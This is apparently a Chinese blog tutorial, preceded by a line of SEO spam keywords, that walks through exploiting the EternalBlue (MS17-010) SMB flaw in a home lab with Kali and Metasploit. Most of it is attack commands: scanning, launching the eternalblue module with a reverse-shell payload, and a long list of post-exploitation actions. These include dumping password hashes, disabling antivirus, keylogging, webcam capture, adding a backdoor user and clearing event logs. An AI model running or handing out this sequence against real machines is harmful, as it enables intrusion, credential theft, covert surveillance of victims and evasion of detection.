宁波网络推广产品服务,seo是干什么的,微博推广渠道,广告灯箱设计制作价格1、永恒之蓝#xff08;Eternal Blue#xff09;
永恒之蓝是指2017年4月14日晚#xff0c;黑客团体Shadow Brokers#xff08;影子经纪人#xff09;公布一大批网络攻击工具#xff0c;其中包含“永恒之蓝”工具#xff0c;“永恒之蓝”利用Windows系统的SMB漏洞可以获…1、永恒之蓝Eternal Blue
永恒之蓝是指2017年4月14日晚黑客团体Shadow Brokers影子经纪人公布一大批网络攻击工具其中包含“永恒之蓝”工具“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招被勒索支付高额赎金才能解密恢复文件。
2、复现环境
角色操作系统IP地址攻击机kali192.168.126.131靶机Windows 7 家庭普通版192.168.126.147
注意VMware Workstation pro16安装win7靶机安装VWware tools时提示驱动无法自动安装是因为微软更新了驱动程序签名算法2019年开始弃用SHA1改用SHA2所以要打kb4474419补丁但是打上补丁后永恒之蓝漏洞会被修复所以安装完tools后需要把补丁卸载
3、漏洞复现 主机发现 利用kali的nmap进行扫描 nmap 192.168.126.147扫描到开放了445端口而永恒之蓝利用的就是445端口的smb服务操作系统溢出漏洞。 使用msf框架 在kali终端输入 # 进入msf模板库
msfconsole# 寻找MS17-010相关模板库
search ms17-010进入msf模块 使用auxiliary/scanner/smb/smb_ms17_010 模块扫描靶机是否存在该漏洞 # 选择使用exploit/windows/smb/ms17_010_psexec模块
msf6 use auxiliary/scanner/smb/smb_ms17_010查看模块需要配置的参数 show options图中Required值为yes的对应Current Setting都需要填写 设置参数后扫描 RHOSTS 参数是要探测主机的ip或ip范围 设置攻击目标ip # 设置目标主机IP
set rhosts 192.168.126.147# 扫描
run提示主机容易被攻击 使用exploit/windows/smb/ms17_010_eternalblue攻击模块 # 使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue# 查看漏洞信息
info# 查看可以攻击的系统
show targets# 查看该漏洞下可以使用的payload
show payloads# 查看需要设置的参数
show options# 设置payload默认payload/windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp# 设置目标IP
set rhosts 192.168.126.147# 执行攻击
run在这里可以执行文件上传下载获取截屏获取密码使用摄像头后门持久化等操作
4、后渗透阶段
在meterpreter 中我们可以使用以下的命令来实现对目标的操作
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
clearev #清除日志